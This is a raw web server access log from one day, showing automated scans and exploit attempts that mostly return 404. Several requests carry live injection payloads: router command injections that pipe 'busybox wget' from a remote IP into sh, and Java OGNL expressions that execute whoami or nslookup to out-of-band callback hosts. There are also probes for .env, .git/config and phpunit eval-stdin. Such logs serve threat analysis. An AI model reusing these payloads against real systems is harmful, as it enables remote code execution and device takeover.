194.165.16.11 - - [27/Oct/2025:00:01:56 +0100] "GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://d3qe7gf49vd8v4f7qkogn6sht6g137nui.oast.site; HTTP/1.1" 404 748
164.92.148.118 - - [27/Oct/2025:00:05:47 +0100] "GET / HTTP/1.1" 200 1895
45.132.49.26 - - [27/Oct/2025:00:09:05 +0100] "-" 400 1930
194.165.16.11 - - [27/Oct/2025:00:14:11 +0100] "POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1" 404 727
194.165.16.11 - - [27/Oct/2025:00:14:12 +0100] "GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1" 404 797
194.165.16.11 - - [27/Oct/2025:00:14:12 +0100] "POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1" 404 727
204.76.203.219 - - [27/Oct/2025:00:25:35 +0100] "GET / HTTP/1.1" 200 1895
45.95.147.173 - - [27/Oct/2025:00:28:37 +0100] "CONNECT example.com:443 HTTP/1.1" 400 804
147.185.132.63 - - [27/Oct/2025:01:08:46 +0100] "GET / HTTP/1.1" 200 1895
176.65.149.30 - - [27/Oct/2025:01:13:57 +0100] "GET /login HTTP/1.1" 404 723
207.154.228.110 - - [27/Oct/2025:01:22:36 +0100] "GET / HTTP/1.1" 200 1895
147.185.132.198 - - [27/Oct/2025:01:29:25 +0100] "GET / HTTP/1.0" 200 1895
176.65.149.19 - - [27/Oct/2025:01:37:02 +0100] "GET /login HTTP/1.1" 404 723
66.132.153.48 - - [27/Oct/2025:01:38:46 +0100] "GET / HTTP/1.1" 200 1895
66.132.153.48 - - [27/Oct/2025:01:38:50 +0100] "GET / HTTP/1.1" 200 1895
66.132.153.48 - - [27/Oct/2025:01:38:50 +0100] "GET /favicon.ico HTTP/1.1" 404 729
66.132.153.48 - - [27/Oct/2025:01:38:53 +0100] "GET /favicon.ico HTTP/1.1" 404 729
66.132.153.48 - - [27/Oct/2025:01:38:54 +0100] "GET /security.txt HTTP/1.1" 404 730
64.62.156.66 - - [27/Oct/2025:01:42:09 +0100] "-" 400 1930
204.76.203.18 - - [27/Oct/2025:01:59:40 +0100] "GET / HTTP/1.1" 200 1895
204.76.203.18 - - [27/Oct/2025:02:08:29 +0100] "GET /bins/ HTTP/1.1" 404 727
204.76.203.18 - - [27/Oct/2025:02:21:46 +0100] "GET /bin/ HTTP/1.1" 404 726
204.76.203.219 - - [27/Oct/2025:02:22:23 +0100] "GET / HTTP/1.1" 200 1895
204.76.203.18 - - [27/Oct/2025:02:36:17 +0100] "GET /backup/ HTTP/1.1" 404 729
98.80.4.58 - - [27/Oct/2025:02:53:38 +0100] "GET / HTTP/1.1" 200 1895
204.76.203.212 - - [27/Oct/2025:02:58:59 +0100] "GET / HTTP/1.1" 200 1895
94.74.191.4 - - [27/Oct/2025:03:16:50 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756
18.206.38.162 - - [27/Oct/2025:03:42:26 +0100] "GET / HTTP/1.1" 200 1895
204.76.203.208 - - [27/Oct/2025:04:12:39 +0100] "GET /server.js HTTP/1.1" 404 727
176.65.149.19 - - [27/Oct/2025:04:22:18 +0100] "GET /login HTTP/1.1" 404 723
204.76.203.219 - - [27/Oct/2025:04:29:52 +0100] "GET / HTTP/1.1" 200 1895
196.251.115.248 - - [27/Oct/2025:04:37:46 +0100] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804
172.245.241.123 - - [27/Oct/2025:04:59:52 +0100] "GET / HTTP/1.1" 200 1895
212.97.67.15 - - [27/Oct/2025:05:00:17 +0100] "GET / HTTP/1.1" 200 1895
176.65.149.19 - - [27/Oct/2025:05:23:21 +0100] "GET /login HTTP/1.1" 404 723
94.74.191.127 - - [27/Oct/2025:05:28:18 +0100] "GET / HTTP/1.1" 200 1895
204.76.203.212 - - [27/Oct/2025:06:10:15 +0100] "GET / HTTP/1.1" 200 1895
185.189.182.234 - - [27/Oct/2025:06:13:03 +0100] "GET / HTTP/1.1" 400 771
204.76.203.219 - - [27/Oct/2025:06:22:52 +0100] "GET / HTTP/1.1" 200 1895
18.97.5.113 - - [27/Oct/2025:06:26:51 +0100] "GET / HTTP/1.1" 200 1895
64.62.156.212 - - [27/Oct/2025:07:29:14 +0100] "GET / HTTP/1.1" 200 1895
64.62.156.212 - - [27/Oct/2025:07:29:49 +0100] "GET /favicon.ico HTTP/1.1" 404 729
64.62.156.221 - - [27/Oct/2025:07:30:07 +0100] "GET /?format=json HTTP/1.1" 200 1895
64.62.156.215 - - [27/Oct/2025:07:30:12 +0100] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804
64.62.156.212 - - [27/Oct/2025:07:30:26 +0100] "GET /geoserver/web/ HTTP/1.1" 404 740
71.6.232.24 - - [27/Oct/2025:07:31:26 +0100] "GET / HTTP/1.1" 200 1895
204.76.203.219 - - [27/Oct/2025:08:38:50 +0100] "GET / HTTP/1.1" 200 1895
193.142.147.209 - - [27/Oct/2025:09:28:11 +0100] "GET / HTTP/1.1" 200 1895
204.76.203.212 - - [27/Oct/2025:09:29:54 +0100] "GET / HTTP/1.1" 200 1895
204.76.203.230 - - [27/Oct/2025:09:33:31 +0100] "CONNECT cfdump.packetsdatabase.com:443 HTTP/1.1" 400 804
178.128.96.39 - - [27/Oct/2025:09:48:51 +0100] "-" 400 1930
178.128.96.39 - - [27/Oct/2025:09:48:52 +0100] "-" 400 1930
178.128.96.39 - - [27/Oct/2025:09:48:52 +0100] "GET / HTTP/1.1" 200 1895
178.128.96.39 - - [27/Oct/2025:09:48:52 +0100] "GET /download/powershell/ HTTP/1.1" 404 746
178.128.96.39 - - [27/Oct/2025:09:48:53 +0100] "GET /get.php HTTP/1.1" 404 725
138.197.16.14 - - [27/Oct/2025:10:09:28 +0100] "GET / HTTP/1.1" 200 1895
138.197.16.14 - - [27/Oct/2025:10:09:28 +0100] "-" 400 1930
204.76.203.219 - - [27/Oct/2025:10:26:04 +0100] "GET / HTTP/1.1" 200 1895
20.65.195.19 - - [27/Oct/2025:10:41:31 +0100] "GET / HTTP/1.1" 200 1895
20.65.195.19 - - [27/Oct/2025:10:41:31 +0100] "-" 400 1930
147.185.132.108 - - [27/Oct/2025:10:49:53 +0100] "-" 400 1930
147.185.132.108 - - [27/Oct/2025:10:49:53 +0100] "-" 400 1930
194.165.16.11 - - [27/Oct/2025:11:28:56 +0100] "GET null HTTP/1.1" 400 1994
194.165.16.11 - - [27/Oct/2025:11:28:56 +0100] "GET /34HnpJfMz2ytlzEsWiuW2PDCtJd HTTP/1.1" 404 745
176.65.149.30 - - [27/Oct/2025:11:41:48 +0100] "GET /login HTTP/1.1" 404 723
204.76.203.233 - - [27/Oct/2025:11:42:03 +0100] "CONNECT ipv4.icanhazip.com:443 HTTP/1.1" 400 804
193.142.147.209 - - [27/Oct/2025:11:50:00 +0100] "GET / HTTP/1.1" 200 1895
88.214.25.123 - - [27/Oct/2025:11:59:07 +0100] "-" 400 1930
94.74.191.127 - - [27/Oct/2025:12:08:02 +0100] "GET / HTTP/1.1" 200 1895
204.76.203.219 - - [27/Oct/2025:12:27:26 +0100] "GET / HTTP/1.1" 200 1895
185.243.96.116 - - [27/Oct/2025:12:29:44 +0100] "-" 400 1930
185.243.96.116 - - [27/Oct/2025:12:32:39 +0100] "-" 400 1930
185.243.96.116 - - [27/Oct/2025:12:32:39 +0100] "-" 400 1930
204.76.203.212 - - [27/Oct/2025:12:35:31 +0100] "GET / HTTP/1.1" 200 1895
176.65.149.19 - - [27/Oct/2025:13:08:45 +0100] "GET /login HTTP/1.1" 404 723
85.208.84.169 - - [27/Oct/2025:13:20:23 +0100] "-" 400 1930
85.215.240.138 - - [27/Oct/2025:13:44:44 +0100] "GET / HTTP/1.1" 200 1895
85.215.240.138 - - [27/Oct/2025:13:45:21 +0100] "GET / HTTP/1.1" 200 1895
44.220.185.171 - - [27/Oct/2025:13:45:59 +0100] "GET / HTTP/1.1" 200 1895
35.216.163.139 - - [27/Oct/2025:14:02:29 +0100] "-" 400 1930
35.216.163.139 - - [27/Oct/2025:14:02:29 +0100] "GET / HTTP/1.1" 200 1895
35.216.163.139 - - [27/Oct/2025:14:02:29 +0100] "-" 400 1930
35.216.163.139 - - [27/Oct/2025:14:02:29 +0100] "GET / HTTP/1.1" 200 1895
35.216.163.139 - - [27/Oct/2025:14:02:29 +0100] "GET /config.json HTTP/1.1" 404 729
35.216.163.139 - - [27/Oct/2025:14:02:29 +0100] "GET /.env HTTP/1.1" 404 722
35.216.163.139 - - [27/Oct/2025:14:02:29 +0100] "GET /telescope/requests HTTP/1.1" 404 740
35.216.163.139 - - [27/Oct/2025:14:02:29 +0100] "GET /info.php HTTP/1.1" 404 726
35.216.163.139 - - [27/Oct/2025:14:02:29 +0100] "GET /.git/config HTTP/1.1" 404 733
35.216.163.139 - - [27/Oct/2025:14:02:29 +0100] "GET /server-status HTTP/1.1" 404 731
68.183.193.242 - - [27/Oct/2025:14:10:42 +0100] "GET /aaa9 HTTP/1.1" 404 722
68.183.193.242 - - [27/Oct/2025:14:10:45 +0100] "GET /aab8 HTTP/1.1" 404 722
68.183.193.242 - - [27/Oct/2025:14:10:48 +0100] "GET / HTTP/1.1" 200 1895
193.142.147.209 - - [27/Oct/2025:14:25:56 +0100] "GET / HTTP/1.1" 200 1895
204.76.203.219 - - [27/Oct/2025:14:29:15 +0100] "GET / HTTP/1.1" 200 1895
194.165.16.11 - - [27/Oct/2025:14:40:22 +0100] "POST /bonita/loginservice HTTP/1.1" 404 741
176.65.149.30 - - [27/Oct/2025:14:58:55 +0100] "GET /login HTTP/1.1" 404 723
35.216.243.84 - - [27/Oct/2025:15:07:16 +0100] "GET / HTTP/1.1" 200 1895
176.65.149.19 - - [27/Oct/2025:15:39:00 +0100] "GET /login HTTP/1.1" 404 723
204.76.203.212 - - [27/Oct/2025:15:48:30 +0100] "GET / HTTP/1.1" 200 1895
45.136.68.49 - - [27/Oct/2025:15:57:51 +0100] "-" 400 1930
4.236.161.123 - - [27/Oct/2025:16:04:45 +0100] "-" 400 1930
204.76.203.219 - - [27/Oct/2025:16:41:37 +0100] "GET / HTTP/1.1" 200 1895
91.46.233.254 - - [27/Oct/2025:16:50:12 +0100] "GET / HTTP/1.0" 200 1895
94.74.191.127 - - [27/Oct/2025:16:50:21 +0100] "GET / HTTP/1.1" 200 1895
45.153.34.156 - - [27/Oct/2025:17:06:16 +0100] "POST /tmUnblock.cgi HTTP/1.1" 404 731
45.153.34.156 - - [27/Oct/2025:17:06:16 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
45.153.34.156 - - [27/Oct/2025:17:06:16 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zqq.sh%7Csh%60 HTTP/1.1" 404 756
45.153.34.156 - - [27/Oct/2025:17:06:16 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1 HTTP/1.1" 404 727
45.153.34.156 - - [27/Oct/2025:17:06:16 +0100] "GET null HTTP/1.1" 400 1994
45.153.34.156 - - [27/Oct/2025:17:06:16 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 731
45.153.34.156 - - [27/Oct/2025:17:06:16 +0100] "POST /goform/mp HTTP/1.1" 404 731
45.153.34.156 - - [27/Oct/2025:17:06:16 +0100] "GET /goform/setUsbUnload/.js?deviceName=A%3Bbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.uzz.sh%7Csh%26echo%20 HTTP/1.0" 404 749
45.153.34.156 - - [27/Oct/2025:17:06:16 +0100] "POST /goform/setPingInfo HTTP/1.1" 404 740
45.153.34.156 - - [27/Oct/2025:17:06:16 +0100] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751
45.153.34.156 - - [27/Oct/2025:17:06:16 +0100] "POST /diagnostic.php HTTP/1.1" 404 732
45.153.34.156 - - [27/Oct/2025:17:06:16 +0100] "GET / HTTP/1.1" 200 1895
45.153.34.156 - - [27/Oct/2025:17:06:16 +0100] "GET /HNAP1/ HTTP/1.1" 404 728
45.153.34.156 - - [27/Oct/2025:17:06:16 +0100] "POST /goform/SystemCommand HTTP/1.1" 404 742
45.153.34.156 - - [27/Oct/2025:17:06:16 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 792
45.153.34.156 - - [27/Oct/2025:17:06:16 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 750
162.243.84.26 - - [27/Oct/2025:17:11:18 +0100] "-" 400 1930
162.243.84.26 - - [27/Oct/2025:17:11:18 +0100] "-" 400 1930
162.243.84.26 - - [27/Oct/2025:17:11:19 +0100] "GET / HTTP/1.1" 200 1895
162.243.84.26 - - [27/Oct/2025:17:11:19 +0100] "GET /download/powershell/ HTTP/1.1" 404 746
162.243.84.26 - - [27/Oct/2025:17:11:19 +0100] "GET /get.php HTTP/1.1" 404 725
91.245.124.175 - - [27/Oct/2025:17:35:24 +0100] "GET /status HTTP/1.1" 404 724
91.245.124.175 - - [27/Oct/2025:17:35:24 +0100] "GET /stat HTTP/1.1" 404 722
194.165.16.11 - - [27/Oct/2025:17:42:15 +0100] "POST /admin/uploads.php?id=1 HTTP/1.1" 404 739
45.95.147.173 - - [27/Oct/2025:17:51:49 +0100] "CONNECT example.com:443 HTTP/1.1" 400 804
85.208.84.169 - - [27/Oct/2025:18:14:17 +0100] "-" 400 1930
204.76.203.219 - - [27/Oct/2025:18:38:29 +0100] "GET / HTTP/1.1" 200 1895
85.208.84.168 - - [27/Oct/2025:18:40:14 +0100] "-" 400 1930
196.251.115.248 - - [27/Oct/2025:19:18:56 +0100] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804
196.251.115.248 - - [27/Oct/2025:19:18:57 +0100] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804
204.76.203.212 - - [27/Oct/2025:19:19:53 +0100] "GET / HTTP/1.1" 200 1895
176.65.149.19 - - [27/Oct/2025:19:23:02 +0100] "GET /login HTTP/1.1" 404 723
94.74.191.4 - - [27/Oct/2025:19:24:14 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756
152.32.251.44 - - [27/Oct/2025:19:50:36 +0100] "-" 400 1930
152.32.251.44 - - [27/Oct/2025:19:50:46 +0100] "GET / HTTP/1.1" 200 1895
152.32.251.44 - - [27/Oct/2025:19:51:05 +0100] "GET /favicon.ico HTTP/1.1" 404 729
152.32.251.44 - - [27/Oct/2025:19:51:05 +0100] "GET /robots.txt HTTP/1.1" 404 728
152.32.251.44 - - [27/Oct/2025:19:51:06 +0100] "GET /sitemap.xml HTTP/1.1" 404 729
152.32.251.44 - - [27/Oct/2025:19:51:06 +0100] "GET /config.json HTTP/1.1" 404 729
198.235.24.177 - - [27/Oct/2025:20:01:46 +0100] "GET / HTTP/1.0" 200 1895
45.136.68.49 - - [27/Oct/2025:20:02:13 +0100] "-" 400 1930
205.210.31.37 - - [27/Oct/2025:20:13:09 +0100] "GET / HTTP/1.1" 200 1895
176.65.149.19 - - [27/Oct/2025:20:30:04 +0100] "GET /login HTTP/1.1" 404 723
194.165.16.11 - - [27/Oct/2025:20:43:36 +0100] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 404 1009
194.165.16.11 - - [27/Oct/2025:20:43:36 +0100] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20d3qe7gf49vd8v4f7qkog4wccww3yhmn81.oast.site%22%29%7D/ HTTP/1.1" 404 842
204.76.203.219 - - [27/Oct/2025:20:44:51 +0100] "GET / HTTP/1.1" 200 1895
176.65.148.246 - - [27/Oct/2025:21:52:30 +0100] "GET / HTTP/1.1" 200 1895
204.76.203.212 - - [27/Oct/2025:22:18:06 +0100] "GET / HTTP/1.1" 200 1895
94.74.191.4 - - [27/Oct/2025:22:28:34 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756
204.76.203.219 - - [27/Oct/2025:22:32:36 +0100] "GET / HTTP/1.1" 200 1895
176.65.149.19 - - [27/Oct/2025:22:37:18 +0100] "GET /login HTTP/1.1" 404 723
176.65.148.246 - - [27/Oct/2025:22:42:41 +0100] "GET / HTTP/1.1" 200 1895
3.132.23.201 - - [27/Oct/2025:22:42:43 +0100] "GET / HTTP/1.1" 200 1895
3.132.23.201 - - [27/Oct/2025:22:42:44 +0100] "GET / HTTP/1.1" 200 1895
3.132.23.201 - - [27/Oct/2025:22:45:15 +0100] "-" 400 1930
3.132.23.201 - - [27/Oct/2025:22:47:12 +0100] "-" 400 1930
3.132.23.201 - - [27/Oct/2025:22:47:21 +0100] "-" 400 1930
85.208.84.168 - - [27/Oct/2025:23:12:29 +0100] "-" 400 1930
198.235.24.255 - - [27/Oct/2025:23:26:12 +0100] "GET / HTTP/1.1" 200 1895
172.245.241.123 - - [27/Oct/2025:23:33:52 +0100] "GET / HTTP/1.1" 200 1895
85.208.84.169 - - [27/Oct/2025:23:42:21 +0100] "-" 400 1930